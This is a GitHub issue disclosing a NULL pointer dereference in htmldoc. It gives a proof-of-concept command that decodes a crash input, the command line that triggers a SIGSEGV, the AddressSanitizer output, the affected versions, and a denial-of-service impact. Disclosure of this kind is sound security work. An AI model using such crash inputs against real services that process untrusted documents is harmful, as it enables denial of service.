NULL Pointer Dereference (SIGSEGV)
chameleon10712 opened this issue · 1 comments
chameleon10712 commented
### Description

Null pointer dereference in htmldoc

### Proof of Concept

```sh
echo -ne "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" | base64 -d > poc
```
Normal build:

```console
$ /home/oceane/fuzz_test/htmldoc/build_norm/bin/htmldoc --batch /home/oceane/fuzz_test/htmldoc_asan/testsuite/testsuite.book --format html --no-localfiles --titleimage ./ducks.jpg ./poc
ERR005: Unable to find "./poc"...
ERR005: Unable to find image file "./ducks.jpg"!
fish: “/home/oceane/fuzz_test/htmldoc/…” terminated by signal SIGSEGV (Address boundary error)
```
Build with ASAN:

```console
$ /home/oceane/fuzz_test/htmldoc_asan/build_asan_flag/bin/htmldoc --batch /home/oceane/fuzz_test/htmldoc_asan/testsuite/testsuite.book --format html --no-localfiles --titleimage ./ducks.jpg ./poc
ERR005: Unable to find "./poc"...
ERR005: Unable to find image file "./ducks.jpg"!
AddressSanitizer:DEADLYSIGNAL
=================================================================
==2118150==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000404 (pc 0x5557dcbbcf60 bp 0x7ffd3d4117e0 sp 0x7ffd3d411770 T0)
==2118150==The signal is caused by a READ memory access.
==2118150==Hint: address points to the zero page.
    #0 0x5557dcbbcf5f (/home/oceane/fuzz_test/htmldoc_asan/build_asan_flag/bin/htmldoc+0xa2f5f)
    #1 0x5557dcb62d36 (/home/oceane/fuzz_test/htmldoc_asan/build_asan_flag/bin/htmldoc+0x48d36)
    #2 0x7fc8b2037082 in __libc_start_main ../csu/libc-start.c:308
    #3 0x5557dcb6c8ad (/home/oceane/fuzz_test/htmldoc_asan/build_asan_flag/bin/htmldoc+0x528ad)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV (/home/oceane/fuzz_test/htmldoc_asan/build_asan_flag/bin/htmldoc+0xa2f5f)
==2118150==ABORTING
```
- git commit a4b0dfe5c
- gcc (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0
- g++ (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0
- Ubuntu 20.04.6 LTS
- Intel(R) Core(TM) i7-10700 CPU @ 2.90GHz
### Affected Version
- git commit a4b0dfe
- v1.9.16
- v1.9.15
### Impact
- Denial of Service
- NULL Pointer Dereference
michaelrsweet commented